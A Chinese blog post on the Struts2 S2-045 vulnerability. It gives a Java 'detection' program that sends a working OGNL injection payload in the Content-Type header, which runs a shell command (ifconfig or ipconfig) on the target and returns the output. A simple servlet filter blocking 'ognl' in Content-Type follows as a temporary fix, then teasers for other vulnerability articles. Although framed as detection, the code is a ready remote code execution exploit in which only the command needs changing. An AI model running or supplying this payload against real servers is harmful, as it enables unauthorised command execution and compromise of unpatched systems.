struts2 s2-045漏洞检测 &临时解决方案

struts2 漏洞检测代码 (文件上传代码和 exce命令来均自网络 懒得自己写) public static String upload(String url,String filePath){ String fdfsPath = ; try { DefaultHttpClient httpclient = new DefaultHttpClient(); HttpPost httppost = new HttpPo
struts2 漏洞检测代码      (文件上传代码和 exce命令来均自网络 懒得自己写)
  
  public static String upload(String url,String filePath){
       String fdfsPath = "";
       try {


           DefaultHttpClient httpclient = new DefaultHttpClient();
           HttpPost httppost = new HttpPost(url);
           File file = new File(filePath);
           String name = file.getName();
           InputStream in = new FileInputStream(file);
           MultipartEntity reqEntity = new MultipartEntity();
           InputStreamBody inputStreamBody = new InputStreamBody(in,name);
           StringBody fileNam = new StringBody(name);
           StringBody dateFlag = new StringBody("20160122152301");
           StringBody datumType = new StringBody("0");
           StringBody uploadWay = new StringBody("0");
           StringBody userId = new StringBody("0538");
           StringBody tenderId = new StringBody("2315");
           StringBody metrialsType = new StringBody("25");
           StringBody ip = new StringBody("0.0.0.1");
           StringBody driverName = new StringBody("huawei");
           StringBody systemVersion = new StringBody("djf");
           StringBody position = new StringBody("信息路38",  Charset.forName("utf8")); 
           reqEntity.addPart("datums", inputStreamBody);
           reqEntity.addPart("fileName", fileNam);
           reqEntity.addPart("dateFlag", dateFlag);
           reqEntity.addPart("datumType", datumType);
           reqEntity.addPart("uploadWay", uploadWay);
           reqEntity.addPart("userId", userId);
           reqEntity.addPart("tenderId", tenderId);
           reqEntity.addPart("metrialsType", metrialsType);
           reqEntity.addPart("ip", ip);
           reqEntity.addPart("driverName", driverName);
           reqEntity.addPart("systemVersion", systemVersion);
           reqEntity.addPart("position", position);  
   //linux
          // httppost.addHeader("Content-Type", "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ifconfig').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"); 
            //windows
   httppost.addHeader("Content-Type", "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ipconfig').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"); 
           httppost.addHeader("User-Agent","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36");
           HttpResponse response = httpclient.execute(httppost);
           int statusCode = response.getStatusLine().getStatusCode();


           if(statusCode == HttpStatus.SC_OK){


               System.out.println("服务器正常响应.....");


               HttpEntity resEntity = response.getEntity();
               System.out.println(EntityUtils.toString(resEntity));//httpclient自带的工具类读取返回数据


               System.out.println(resEntity.getContent());


               EntityUtils.consume(resEntity);
           }else{
             System.out.println(HttpStatus.getStatusText(statusCode));
           }
       } catch (Exception e) {
           e.printStackTrace();
       }
       System.out.println("结束....");
       return "";
   }


 
public static void main(String args[]) throws IOException {
System.out.println("开始....");
upload("http://www.xxx.cn/website/index.do","E:\\www\\index.txt"); 
}

------------------------------------------------------------------------------------------------
临时解决办法
ForbiddenAccessFilter.java


public class ForbiddenAccessFilter extends OncePerRequestFilter { 


protected void doFilterInternal(HttpServletRequest request, HttpServletResponse response,
FilterChain chain) throws ServletException, IOException {
String contentType=request.getContentType();
if(contentType!=null&&contentType.indexOf("ognl")!=-1){ 
System.out.println(contentType);
return;
}else{  
chain.doFilter(request, response);
}
}
 
}


web.xml 配置
<filter>
<filter-name>forbiddenAccessFilter</filter-name>
<filter-class>com.ahtec.webapp.filters.ForbiddenAccessFilter</filter-class>
</filter>
<filter-mapping>
<filter-name>forbiddenAccessFilter</filter-name>
<url-pattern>/*</url-pattern>

</filter-mapping>

本站部分内容来源互联网,如果有图片或者内容侵犯您的权益请联系我们删除!

相关文档推荐

漏洞描述: ECShop的user.php文件中的display函数的模版变量可控,导致注入,配合注入可达到远程代码执行。攻击者无需登录站点等操作,直接可以利用漏洞获取服务器权限,危害严重。 漏洞评级: 严重 影响范围: ECShop全系列版本,包括2.x,3.0.x,3.6.x等 安
漏洞描述: memcache是一套常用的key-value缓存系统,由于它本身没有权限控制模块,所以开放在外网的memcache服务很容易被攻击者扫描发现,通过命令交互可直接读取memcache中的敏感信息。 修复方案: 因memcache无权限控制功能,所以需要用户对访问来源进行
近期境外黑客组织The ShadowBrokers公布了一批Windows高危漏洞及批量利用工具,利用该工具可致Windows机器被执行任意命令,引发包括主机蓝屏、被入侵删除数据等一系列严重后果。 微软官方已发布了漏洞补丁,但大量客户尚未修补,风险极大,同时安全求助量也
只要一个文件有(.asp)后面再带上分号(;)后面再带上一个随意字符加上扩展名如(cao.asp;ca.jpg)这个文件Windows会当成jpg图像文件,但是这种文件在IIS中会被当成asp运行
蓝屏漏洞威胁的是服务器操作系统Windows Server 2008,这意味着如果Windows Server 2008蓝屏,将导致服务器停止服务……
Serv-U是一个极为强大的FTP服务器软件,而近两年不断爆出的各个版本的安全漏洞,却让大家在使用Serv-U时不得不多留个心眼。本文对Serv-U漏洞进行详细地分析,防患于未然,安全设置以后还是可以使用的